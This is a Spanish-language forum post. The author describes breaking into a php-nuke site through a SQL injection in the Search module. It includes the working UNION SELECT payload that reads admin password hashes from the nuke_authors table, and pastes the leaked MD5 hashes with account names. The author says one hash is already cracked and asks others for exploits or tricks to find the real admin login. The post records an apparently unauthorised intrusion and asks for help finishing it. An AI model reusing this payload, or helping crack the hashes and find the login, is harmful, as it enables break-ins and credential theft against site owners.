Autor
En una pagina de php-nuke (una version algo vieja, no estoy seguro de cual sea), resulta que aproveche un bug a traves de una inyeccion sql en el modulo search (muchos de ustedes deben conocer ese exploit), el cual devulve los passw en md5, he conceguido descifrar el passw. El problema es al momento de acceder me dice que el nombre que el login no es correcto, es decir que el utiliza el el foro un nombre que no es su login (algo asi como en este foro, en el que puedes cambiar el nombre que los usuarios ven).
Alguno de ustedes sabe alguna forma de saber ese login?... puede ser un exploit o cualquier otra cosa...
aqui dejo lo que la inyeccion sql devolvio...
Citar
Resultados de la Búsqueda
a4e360681676c770121e891f8c407572
Enviado por Fulanito Menganito el Wednesday, 31 December a las 18:59:59
Adjuntar al Artículo:
(13 responde)
53c38591d4d2d7735369d3083df531b3
Enviado por vprada el Wednesday, 31 December a las 18:59:59
Adjuntar al Artículo:
(13 responde)
a4e360681676c770121e891f8c407572
Enviado por Fulanito Menganito el Wednesday, 31 December a las 18:59:59
Adjuntar al Artículo:
(13 responde)
53c38591d4d2d7735369d3083df531b3
Enviado por vprada el Wednesday, 31 December a las 18:59:59
Adjuntar al Artículo:
(13 responde)
Esta fue la inyeccion que utilice
modules.php?name=Search&type=comments&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
El primero fue la clave que desencripte (el segundo estoy en ese proceso
), como pueden ver alli aparece como Fulanito Menganito, cuando lo coloco en el login me dice que no existe...Puede ser que ese passw no sean ciertos y que la pagina no sea vulnerable a ese ataque?
Alguna idea, comentario o sugerencia...??
gracias
Salu2
En línea
